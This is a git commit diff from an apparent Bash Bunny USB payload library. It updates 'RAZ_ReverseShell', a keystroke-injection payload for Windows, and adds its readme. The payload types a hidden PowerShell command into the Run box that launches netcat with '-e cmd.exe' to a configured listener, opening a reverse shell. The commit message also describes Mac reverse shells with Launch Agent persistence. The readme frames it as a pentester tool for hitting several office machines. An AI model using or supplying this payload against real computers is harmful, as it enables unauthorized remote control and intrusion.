Updated payloads for fw v1.1 (#176)

* Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Fixed additional MacReverseShell * Added readme.md files * Added readme.md files * Added readme.md * Added readme.md files * Added readme.md files * Updated for firmware 1.1 * Updated for firmware 1.1 * Added ThemeChanger and updated for firmware 1.1 * Updated readme.md * Updated for firmware 1.1 - using RUN command * Fixed issues with the new RUN - reverted * Fixed a few script problems * removed binary and updated readme.md * added a check for themepack * edited themechanger readme * updated readme.md and version
2025-10-29 16:58:12 +00:00 · 2017-04-28 18:49:35 -04:00
parent ca9e53c5a8
commit 750d384df7
9 changed files with 278 additions and 55 deletions
--- a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
+++ b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
@@ -13,63 +13,69 @@
 #                Intentionally, this script leaves a trace in the Run Box
 #
 # Colors:
-# Green.....................Working
-# White.....................Completed without error
-# White (blinking)..........Incrementing the port in listener_port.txt
-# Blue (blinking)...........listener_port.txt was not found
-# Light-Blue (blinking).....listener_ip.txt was not found
-# Amber (blinking)..........nc.exe was not found
+# | Status     | Color                         | Description                                      |
+# | ---------- | ------------------------------| ------------------------------------------------ |
+# | SETUP      | Magenta solid                 | Setting attack mode, getting the switch position | 
+# | FAIL1      | Red slow blink                | Could not find the listener_port.txt file        | 
+# | FAIL2      | Red fast blink                | Could not find the listener_ip.txt file          | 
+# | FAIL3      | Red very fast blink           | Could not find the nc.exe file                   | 
+# | SPECIAL    | Cyan inverted single blink    | Incrementing the port in listener_port.txt       | 
+# | ATTACK     | Yellow single blink           | Running the VBScript                             | 
+# | FINISH     | Green blink followed by SOLID | Script is finished                               | 

+# Magenta solid
+LED SETUP

 # Change this if you want to enable auto_increment of the netcat port
 # If true, the port number is increased by 1 everytime the script runs
 # This is good for Red Teams doing PenTesting on multiple computers
 auto_increment=false

-LED G
+# Set attack mode to HID and Storage
 ATTACKMODE HID STORAGE

-LANGUAGE='us'
-
 # Get the switch position
-source bunny_helpers.sh
-
+GET SWITCH_POSITION

 # Check for all the files - error if not found. If found, put into variables
 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
-    LED B 100
+    LED FAIL1
    exit 1
 else
  my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
 fi

 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
-    LED B G 100
+    LED FAIL2
    exit 1
 else
    my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
 fi

 if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
-    LED R G 100
+    LED FAIL3
    exit 1
 fi 

+# Start the attack - yellow single blink
+LED ATTACK
+
 # Execute the powershell command in the run box with the appropriate variables
 QUACK GUI r
 QUACK DELAY 100
-QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
+QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"
 QUACK ENTER

+
 # If auto_increment, then update the listener_port file
 if [ "$auto_increment" = true ] ; then   
-   LED R G B 100
+   LED SPECIAL
   echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
   
   # Allow the write to sync to the USB
   sleep 1
 fi

-# Signal everything went OK - white
-LED R G B
+# Green 1000ms VERYFAST blink followed by SOLID
+LED FINISH
 exit 0
--- a/payloads/library/remote_access/RAZ_ReverseShell/readme.md
+++ b/payloads/library/remote_access/RAZ_ReverseShell/readme.md
@@ -0,0 +1,44 @@
+# RAZ_ReverseShell
+* Author: RalphyZ 
+* Version: 1.1
+* Target: Windows 7+
+* Category: Reverse Shell
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes                       |
+| ------- | ------------------------------|
+| 1.1     | Updated for firmware 1.1      |
+| 1.0     | Initial release               |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+nc.exe - Windows binary for netcat with the -e flag
+
+Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat
+
+listener_port.txt - The Port number for the netcat listener
+
+listener_ip.txt - The IP Address for the netcat listener
+ 
+## Description
+Executes a netcat reverse cmd shell at a given IP and Port.  This script leaves a trace in the Run Box.  The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.  
+
+## Configuration
+Set the location of your listener in the listener_ip and listener_port text files.  
+
+If you want the listener port to auto-increment, set:
+
+auto_increment=true
+
+## Colors
+| Status     | Color                         | Description                                      |
+| ---------- | ------------------------------| ------------------------------------------------ |
+| SETUP      | Magenta solid                 | Setting attack mode, getting the switch position | 
+| FAIL1      | Red slow blink                | Could not find the listener_port.txt file        | 
+| FAIL2      | Red fast blink                | Could not find the listener_ip.txt file          | 
+| FAIL3      | Red very fast blink           | Could not find the nc.exe file                   | 
+| SPECIAL    | Cyan inverted single blink    | Incrementing the port in listener_port.txt       | 
+| ATTACK     | Yellow single blink           | Running the VBScript                             | 
+| FINISH     | Green blink followed by SOLID | Script is finished                               |